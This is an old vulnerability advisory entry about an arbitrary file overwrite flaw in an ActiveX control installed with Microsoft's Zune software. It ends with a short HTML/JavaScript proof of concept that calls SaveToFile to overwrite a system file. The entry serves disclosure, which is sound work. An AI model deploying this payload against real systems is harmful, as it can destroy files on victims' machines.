Zune Software ActiveX Arbitrary File Overwrite Exploit

🗓️ 24 Apr 2008 00:00:00Reported by RootType

Zune Software ActiveX Arbitrary File Overwrite Exploit Discovery date: 21 April 2008, Remote: Yes, Credits: J. Bachmann & B. Mariani from Ilion Research Labs, Vulnerable: Zune software: EncProfile2 Class, Arbitrary file overwrite discovered in Zune software ActiveX control


                                                Vulnerability&nbsp;class&nbsp;:&nbsp;Arbitrary&nbsp;file&nbsp;overwrite
Discovery&nbsp;date&nbsp;:&nbsp;21&nbsp;April&nbsp;2008
Remote&nbsp;:&nbsp;Yes
Credits&nbsp;:&nbsp;J.&nbsp;Bachmann&nbsp;&amp;&nbsp;B.&nbsp;Mariani&nbsp;from&nbsp;ilion&nbsp;Research&nbsp;Labs
Vulnerable&nbsp;:&nbsp;Zune&nbsp;software:&nbsp;EncProfile2&nbsp;Class

An&nbsp;arbitrary&nbsp;file&nbsp;overwrite&nbsp;as&nbsp;been&nbsp;discovered&nbsp;in&nbsp;an&nbsp;ActiveX&nbsp;control&nbsp;installed&nbsp;with&nbsp;the&nbsp;Zune&nbsp;software&nbsp;package.
If&nbsp;a&nbsp;user&nbsp;visits&nbsp;the&nbsp;malicious&nbsp;page&nbsp;and&nbsp;authorize&nbsp;the&nbsp;control&nbsp;to&nbsp;run&nbsp;(it&nbsp;is&nbsp;not&nbsp;marked&nbsp;safe&nbsp;for&nbsp;scripting),&nbsp;the&nbsp;attacker&nbsp;can&nbsp;erase&nbsp;an&nbsp;arbitrary&nbsp;file.

POC:
&lt;HTML&gt;
&lt;BODY&gt;
&nbsp;&lt;object&nbsp;id=ctrl&nbsp;classid=&quot;clsid:{0B1C3B47-207F-4CEA-8F31-34E4DB2F6EFD}&quot;&gt;&lt;/object&gt;
&lt;SCRIPT&gt;
function&nbsp;Do_it()
&nbsp;{
&nbsp;&nbsp;&nbsp;File&nbsp;=&nbsp;&quot;c:\\boot_.ini&quot;
&nbsp;&nbsp;&nbsp;ctrl.SaveToFile(File)
&nbsp;}
&lt;/SCRIPT&gt;
&lt;input&nbsp;language=JavaScript&nbsp;onclick=Do_it()&nbsp;type=button&nbsp;value=&quot;Proof&nbsp;of
Concept&quot;&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;

24 Apr 2008 00:00Current

7.1High risk

Vulners AI Score7.1